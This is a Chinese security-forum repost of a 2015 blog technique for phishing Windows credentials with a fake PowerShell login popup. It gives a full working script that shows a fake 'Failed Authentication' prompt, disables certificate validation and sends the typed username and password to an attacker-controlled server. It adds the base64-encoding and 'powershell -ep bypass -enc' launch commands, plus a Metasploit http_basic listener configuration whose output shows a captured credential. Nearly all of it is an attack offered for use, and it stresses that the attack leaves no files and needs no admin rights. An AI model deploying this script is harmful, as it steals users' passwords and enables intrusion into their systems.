Powershell Popups + Capture (WOOYUN)

  • A+
所属分类:WooYun-Zone

五道口杀气 Powershell Popups + Capture  (WOOYUN) | 2015-01-13 18:17

from:http://www.room362.com/blog/2015/01/12/powershell-popups-plus-capture/

这个方法优势就是可以不产生任何文件,可以获取任何权限用户的认证信息

不需要管理员权限,不需要绕过UAC。

原理就是利用powershell脚本制造一个假的登陆界面,管理员登陆之后会把密码发送到我们的服务器上。
这里接收密码是使用的metasploit。

powershell脚本:

$cred = $host.ui.promptforcredential('Failed Authentication','',[Environment]::UserDomainName + "\" + [Environment]::UserName,[Environment]::UserDomainName);[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};
$wc = new-object net.webclient;
$wc.Headers.Add("User-Agent","Wget/1.9+cvs-stable (Red Hat modified)");
$wc.Proxy = [System.Net.WebRequest]::DefaultWebProxy;
$wc.Proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials;
$wc.credentials = new-object system.net.networkcredential($cred.username, $cred.getnetworkcredential().password, '');
$result = $wc.downloadstring('https://172.16.102.163');

172.16.102.163为我们接受的地址。

cat power.txt | iconv --to-code UTF-16LE | base64

把代码生成base64.

然后执行

powershell -ep bypass -enc <base64编码的代码>

Powershell Popups + Capture  (WOOYUN)

metasploit接收密码:

root@wpad:~/metasploit-framework# ./msfconsole -Lq
msf > use auxiliary/server/capture/http_basic
msf auxiliary(http_basic) > show options

Module options (auxiliary/server/capture/http_basic):

   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   REALM        Secure Site      yes       The authentication realm you'd like to present.
   RedirectURL                   no        The page to redirect users to after they enter basic auth creds
   SRVHOST      0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT      80               yes       The local port to listen on.
   SSL          false            no        Negotiate SSL for incoming connections
   SSLCert                       no        Path to a custom SSL certificate (default is randomly generated)
   SSLVersion   SSL3             no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
   URIPATH                       no        The URI to use for this exploit (default is random)

msf auxiliary(http_basic) > set SSL true
SSL => true
msf auxiliary(http_basic) > set SRVPORT 443
SRVPORT => 443
msf auxiliary(http_basic) > set URIPATH /
URIPATH => /
msf auxiliary(http_basic) > run
[*] Auxiliary module execution completed
msf auxiliary(http_basic) >
[*] Listening on 0.0.0.0:443...
[*] Using URL: https://0.0.0.0:443/
[*]  Local IP: https://172.16.102.163:443/
[*] Server started.
[*] 172.16.102.140   http_basic - Sending 401 to client 172.16.102.140
[+] 172.16.102.140 - Credential collected: "SITTINGDUCK\user:ASDqwe123" => /

分享到: